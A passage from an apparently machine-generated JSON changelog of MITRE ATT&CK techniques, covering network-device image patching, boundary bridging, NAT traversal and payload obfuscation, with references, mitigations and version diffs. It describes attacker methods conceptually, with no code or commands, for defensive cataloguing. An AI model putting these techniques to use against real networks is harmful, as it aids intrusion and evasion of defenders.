Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary\u2019s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1601/001",
                            "external_id": "T1601.001"
                        },
                        {
                            "source_name": "Killing IOS diversity myth",
                            "description": "Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020.",
                            "url": "https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf"
                        },
                        {
                            "source_name": "Cisco IOS Forensics Developments",
                            "description": "Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020.",
                            "url": "https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf"
                        },
                        {
                            "source_name": "Cisco IOS Shellcode",
                            "description": "George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved October 21, 2020.",
                            "url": "http://2015.zeronights.org/assets/files/05-Nosenko.pdf"
                        },
                        {
                            "source_name": "Juniper Netscreen of the Dead",
                            "description": "Graeme Neilson . (2009, August). Juniper Netscreen of the Dead. Retrieved October 20, 2020.",
                            "url": "https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf"
                        },
                        {
                            "source_name": "Killing the myth of Cisco IOS rootkits",
                            "description": "Sebastian 'topo' Mu\u00f1iz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020.",
                            "url": "https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.106000+00:00\", \"old_value\": \"2025-10-24 17:49:26.083000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['external_references'][6]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Image File Verification\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#7\"}, \"root['external_references'][7]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Run-Time Memory Verification\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#13\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1032: Multi-factor Authentication",
                            "M1043: Credential Access Protection",
                            "M1045: Code Signing",
                            "M1046: Boot Integrity"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0469: Detection Strategy for Patch System Image on Network Devices"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-19 16:08:29.817000+00:00",
                    "modified": "2026-04-16 20:07:53.048000+00:00",
                    "name": "Network Boundary Bridging",
                    "description": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1599",
                            "external_id": "T1599"
                        },
                        {
                            "source_name": "Kaspersky ThreatNeedle Feb 2021",
                            "description": "Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.",
                            "url": "https://securelist.com/lazarus-threatneedle/100803/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.048000+00:00\", \"old_value\": \"2025-10-24 17:49:16.493000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1032: Multi-factor Authentication",
                            "M1037: Filter Network Traffic",
                            "M1043: Credential Access Protection"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0006: Detection Strategy for Network Boundary Bridging"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-19 16:48:08.241000+00:00",
                    "modified": "2026-04-16 20:07:52.887000+00:00",
                    "name": "Network Address Translation Traversal",
                    "description": "Adversaries may bridge network boundaries by modifying a network device\u2019s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they may modify NAT configurations to send traffic between two separated networks, or to obscure their activities.  In network designs that require NAT to function, such modifications enable the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In network designs that do not require NAT, adversaries may use address translation to further obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1599/001",
                            "external_id": "T1599.001"
                        },
                        {
                            "source_name": "RFC1918",
                            "description": "IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020.",
                            "url": "https://tools.ietf.org/html/rfc1918"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.887000+00:00\", \"old_value\": \"2025-10-24 17:48:46.071000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1032: Multi-factor Authentication",
                            "M1037: Filter Network Traffic",
                            "M1043: Credential Access Protection"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0163: Detection Strategy for Network Address Translation Traversal"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:30:32.662000+00:00",
                    "modified": "2026-04-15 22:14:56.435000+00:00",
                    "name": "Obfuscated Files or Information",
                    "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.(Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.(Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027",
                            "external_id": "T1027"
                        },
                        {
                            "source_name": "Volexity PowerDuke November 2016",
                            "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.",
                            "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
                        },
                        {
                            "source_name": "FireEye Obfuscation June 2017",
                            "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.",
                            "url": "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html"
                        },
                        {
                            "source_name": "FireEye Revoke-Obfuscation July 2017",
                            "description": "Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved November 17, 2024.",
                            "url": "https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf"
                        },
                        {
                            "source_name": "Linux/Cdorked.A We Live Security Analysis",
                            "description": "Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017.",
                            "url": "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/"
                        },
                        {
                            "source_name": "Carbon Black Obfuscation Sept 2016",
                            "description": "Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.",
                            "url": "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/"
                        },
                        {
                            "source_name": "PaloAlto EncodedCommand March 2017",
                            "description": "White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018.",
                            "url": "https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Christiaan Beek, @ChristiaanBeek",
                        "Red Canary"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:14:56.435000+00:00\", \"old_value\": \"2025-10-24 17:49:15.265000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \\n\\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \\n\\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.(Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.(Citation: Carbon Black Obfuscation Sept 2016)\\n\\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) \", \"old_value\": \"Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \\n\\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \\n\\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\\n\\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) \", \"diff\": \"--- \\n+++ \\n@@ -1,7 +1,7 @@\\n Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \\n \\n-Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \\n+Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \\n \\n-Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\\n+Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.(Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.(Citation: Carbon Black Obfuscation Sept 2016)\\n \\n-Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) \\n+Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) \"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.7\"}}, \"iterable_item_removed\": {\"root['external_references'][2]\": {\"source_name\": \"GitHub Revoke-Obfuscation\", \"description\": \"Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018.\", \"url\": \"https://github.com/danielbohannon/Revoke-Obfuscation\"}, \"root['external_references'][5]\": {\"source_name\": \"GitHub Office-Crackros Aug 2016\", \"description\": \"Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018.\", \"url\": \"https://github.com/itsreallynick/office-crackros\"}}}",
                    "previous_version": "1.7",
                    "version_change": "1.7 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to34__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to34__0\"><a href=\"#difflib_chg_to34__top\">t</a></td><td class=\"diff_header\" id=\"from34_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;make&nbsp;an&nbsp;executable&nbsp;or&nbsp;file&nbsp;diffic</td><td class=\"diff_next\"><a href=\"#difflib_chg_to34__top\">t</a></td><td class=\"diff_header\" id=\"to34_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;make&nbsp;an&nbsp;executable&nbsp;or&nbsp;file&nbsp;diffic</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ult&nbsp;to&nbsp;discover&nbsp;or&nbsp;analyze&nbsp;by&nbsp;encrypting,&nbsp;encoding,&nbsp;or&nbsp;other</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ult&nbsp;to&nbsp;discover&nbsp;or&nbsp;analyze&nbsp;by&nbsp;encrypting,&nbsp;encoding,&nbsp;or&nbsp;other</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">wise&nbsp;obfuscating&nbsp;its&nbsp;contents&nbsp;on&nbsp;the&nbsp;system&nbsp;or&nbsp;in&nbsp;transit.&nbsp;T</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">wise&nbsp;obfuscating&nbsp;its&nbsp;contents&nbsp;on&nbsp;the&nbsp;system&nbsp;or&nbsp;in&nbsp;transit.&nbsp;T</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">his&nbsp;is&nbsp;common&nbsp;behavior&nbsp;that&nbsp;can&nbsp;be&nbsp;used&nbsp;across&nbsp;different&nbsp;pla</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">his&nbsp;is&nbsp;common&nbsp;behavior&nbsp;that&nbsp;can&nbsp;be&nbsp;used&nbsp;across&nbsp;different&nbsp;pla</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tforms&nbsp;and&nbsp;the&nbsp;network&nbsp;to&nbsp;evade&nbsp;defenses.&nbsp;&nbsp;&nbsp;Payloads&nbsp;may&nbsp;be&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tforms&nbsp;and&nbsp;the&nbsp;network&nbsp;to&nbsp;evade&nbsp;defenses.&nbsp;&nbsp;&nbsp;Payloads&nbsp;may&nbsp;be&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">compressed,&nbsp;archived,&nbsp;or&nbsp;encrypted&nbsp;in&nbsp;order&nbsp;to&nbsp;avoid&nbsp;detecti</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">compressed,&nbsp;archived,&nbsp;or&nbsp;encrypted&nbsp;in&nbsp;order&nbsp;to&nbsp;avoid&nbsp;detecti</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on.&nbsp;These&nbsp;payloads&nbsp;may&nbsp;be&nbsp;used&nbsp;during&nbsp;Initial&nbsp;Access&nbsp;or&nbsp;late</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on.&nbsp;These&nbsp;payloads&nbsp;may&nbsp;be&nbsp;used&nbsp;during&nbsp;Initial&nbsp;Access&nbsp;or&nbsp;late</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;to&nbsp;mitigate&nbsp;detection.&nbsp;Sometimes&nbsp;a&nbsp;user's&nbsp;action&nbsp;may&nbsp;be&nbsp;re</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;to&nbsp;mitigate&nbsp;detection.&nbsp;Sometimes&nbsp;a&nbsp;user's&nbsp;action&nbsp;may&nbsp;be&nbsp;re</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">quired&nbsp;to&nbsp;open&nbsp;and&nbsp;[Deobfuscate/Decode&nbsp;Files&nbsp;or&nbsp;Information]</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">quired&nbsp;to&nbsp;open&nbsp;and&nbsp;[Deobfuscate/Decode&nbsp;Files&nbsp;or&nbsp;Information]</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(https://attack.mitre.org/techniques/T1140)&nbsp;for&nbsp;[User&nbsp;Execut</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(https://attack.mitre.org/techniques/T1140)&nbsp;for&nbsp;[User&nbsp;Execut</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion](https://attack.mitre.org/techniques/T1204).&nbsp;The&nbsp;user&nbsp;ma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion](https://attack.mitre.org/techniques/T1204).&nbsp;The&nbsp;user&nbsp;ma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;also&nbsp;be&nbsp;required&nbsp;to&nbsp;input&nbsp;a&nbsp;password&nbsp;to&nbsp;open&nbsp;a&nbsp;password&nbsp;pr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;also&nbsp;be&nbsp;required&nbsp;to&nbsp;input&nbsp;a&nbsp;password&nbsp;to&nbsp;open&nbsp;a&nbsp;password&nbsp;pr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 